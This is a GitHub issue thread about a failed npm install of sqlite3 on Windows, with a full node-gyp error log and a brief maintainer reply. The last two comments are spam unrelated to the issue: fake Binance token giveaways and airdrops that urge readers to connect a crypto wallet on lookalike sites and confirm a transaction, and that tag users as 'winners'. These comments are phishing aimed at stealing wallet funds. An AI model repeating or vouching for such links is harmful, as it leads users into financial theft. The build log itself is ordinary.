### ISSUE TITLE
error

### ISSUE THREAD

**Issue by charliewang789** [KjetilVaa/Sello-2.0#1]
Hi when I run npm install, i got the following errors, any suggestion?

node-pre-gyp ERR! Tried to download(403): https://mapbox-node-binary.s3.amazonaws.com/sqlite3/v3.1.13/node-v64-win32-x64.tar.gz
node-pre-gyp ERR! Pre-built binaries not found for sqlite3@3.1.13 and node@10.16.1 (node-v64 ABI) (falling back to source compile with node-gyp)
node-pre-gyp ERR! Tried to download(undefined): https://mapbox-node-binary.s3.amazonaws.com/sqlite3/v3.1.13/node-v64-win32-x64.tar.gz
node-pre-gyp ERR! Pre-built binaries not found for sqlite3@3.1.13 and node@10.16.1 (node-v64 ABI) (falling back to source compile with node-gyp)
gypgyp ERR!  ERR! configure error
configure error
gypgyp  ERR!ERR!  stackstack Error: Command failed: C:\Users\INTEL\AppData\Local\Programs\Python\Python36\python.EXE -c import sys; print "%s.%s.%s" % sys.version_info[:3];
 Error: Command failed: C:\Users\INTEL\AppData\Local\Programs\Python\Python36\python.EXE -c import sys; print "%s.%s.%s" % sys.version_info[:3];
gypgyp  ERR!ERR!  stackstack   File "<string>", line 1
   File "<string>", line 1
gypgyp  ERR!ERR!  stackstack     import sys; print "%s.%s.%s" % sys.version_info[:3];
     import sys; print "%s.%s.%s" % sys.version_info[:3];
gypgyp  ERR!ERR!  stack                                ^
stackgyp                                ^
 gypERR!  ERR!stack  SyntaxError: invalid syntax
stackgyp SyntaxError: invalid syntax
 gypERR!  ERR!stack
stackgyp
 gypERR!  ERR!stack      at ChildProcess.exithandler (child_process.js:294:12)
stackgyp     at ChildProcess.exithandler (child_process.js:294:12)
 gypERR!  ERR!stack      at ChildProcess.emit (events.js:198:13)
stackgyp     at ChildProcess.emit (events.js:198:13)
 gypERR!  ERR!stack      at maybeClose (internal/child_process.js:982:16)
stackgyp     at maybeClose (internal/child_process.js:982:16)
 gypERR!  ERR!stack      at Process.ChildProcess._handle.onexit (internal/child_process.js:259:5)
stack     at Process.ChildProcess._handle.onexit (internal/child_process.js:259:5)
gyp ERR!gyp  SystemERR! Windows_NT 10.0.18362
 gypSystem  Windows_NT 10.0.18362
ERR!gyp  commandERR! "C:\\Program Files\\nodejs\\node.exe" "C:\\Program Files\\nodejs\\node_modules\\npm\\node_modules\\node-gyp\\bin\\node-gyp.js" "configure" "--fallback-to-build" "--module=D:\\source\\Sello\\node_modules\\sqlite3\\lib\\binding\\node-v64-win32-x64\\node_sqlite3.node" "--module_name=node_sqlite3" "--module_path=D:\\source\\Sello\\node_modules\\sqlite3\\lib\\binding\\node-v64-win32-x64"
 gypcommand  "C:\\Program Files\\nodejs\\node.exe" "C:\\Program Files\\nodejs\\node_modules\\npm\\node_modules\\node-gyp\\bin\\node-gyp.js" "configure" "--fallback-to-build" "--module=D:\\source\\Sello\\node_modules\\sqlite3\\lib\\binding\\node-v64-win32-x64\\node_sqlite3.node" "--module_name=node_sqlite3" "--module_path=D:\\source\\Sello\\node_modules\\sqlite3\\lib\\binding\\node-v64-win32-x64"
ERR!gyp  cwdERR! D:\source\Sello\node_modules\sqlite3
 gypcwd  D:\source\Sello\node_modules\sqlite3
ERR!gyp  node -vERR! v10.16.1
 gypnode -v  v10.16.1
ERR!gyp  node-gyp -vERR! v3.8.0
 gypnode-gyp -v  v3.8.0
ERR!gyp  ERR!not ok
not ok
node-pre-gyp ERR! build error
node-pre-gyp ERR! stack Error: Failed to execute 'C:\Program Files\nodejs\node.exe C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\bin\node-gyp.js configure --fallback-to-build --module=D:\source\Sello\node_modules\sqlite3\lib\binding\node-v64-win32-x64\node_sqlite3.node --module_name=node_sqlite3 --module_path=D:\source\Sello\node_modules\sqlite3\lib\binding\node-v64-win32-x64' (1)
node-pre-gyp ERR! stack     at ChildProcess.<anonymous> (D:\source\Sello\node_modules\sqlite3\node_modules\node-pre-gyp\lib\util\compile.js:83:29)
node-pre-gyp ERR! stack     at ChildProcess.emit (events.js:198:13)
node-pre-gyp ERR! stack     at maybeClose (internal/child_process.js:982:16)
node-pre-gyp ERR! stack     at Process.ChildProcess._handle.onexit (internal/child_process.js:259:5)
node-pre-gyp ERR! System Windows_NT 10.0.18362
node-pre-gyp ERR! command "C:\\Program Files\\nodejs\\node.exe" "D:\\source\\Sello\\node_modules\\sqlite3\\node_modules\\node-pre-gyp\\bin\\node-pre-gyp" "install" "--fallback-to-build"
node-pre-gyp ERR! cwd D:\source\Sello\node_modules\sqlite3
node-pre-gyp ERR! node -v v10.16.1
node-pre-gyp ERR! node-pre-gyp -v v0.6.38
node-pre-gyp ERR! not ok
Failed to execute 'C:\Program Files\nodejs\node.exe C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\bin\node-gyp.js configure --fallback-to-build --module=D:\source\Sello\node_modules\sqlite3\lib\binding\node-v64-win32-x64\node_sqlite3.node --module_name=node_sqlite3 --module_path=D:\source\Sello\node_modules\sqlite3\lib\binding\node-v64-win32-x64' (1)
npm WARN geofire@4.1.2 requires a peer of firebase@^2.4.0 || 3.x.x but none is installed. You must install peer dependencies yourself.
npm WARN react-native-branch@2.0.0-beta.3 requires a peer of react@>=15.4.0 but none is installed. You must install peer dependencies yourself.
npm WARN lottie-react-native@1.1.1 requires a peer of react@>=15.3.1 but none is installed. You must install peer dependencies yourself.
npm WARN react-native-maps@0.14.0 requires a peer of react@>=15.4.0 but none is installed. You must install peer dependencies yourself.

npm ERR! code ELIFECYCLE
npm ERR! errno 1
npm ERR! sqlite3@3.1.13 install: `node-pre-gyp install --fallback-to-build`
npm ERR! Exit status 1
npm ERR!
npm ERR! Failed at the sqlite3@3.1.13 install script.
npm ERR! This is probably not a problem with npm. There is likely additional logging output above.

npm ERR! A complete log of this run can be found in:
npm ERR!     C:\Users\INTEL\AppData\Roaming\npm-cache\_logs\2019-09-28T00_46_17_107Z-debug.log

D:\source\Sello>

**Comment by KjetilVaa** [comment]
Hmm. Have you tried:
`npm install --build-from-resource`
Please provide the output from this command.

**Comment by bajarang-agarwal1** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![Binance Free Tokens](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

## Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Claimed my free tokens on Binance! 🌟 #BinanceFreeTokens #Crypto](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰

**Comment by Pawanpatidar99** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @rikitikitaw1, @lonelywm, @Helyux, @Rustemhak, @IlyaSinyugin, @nashsu, @Dadogg80
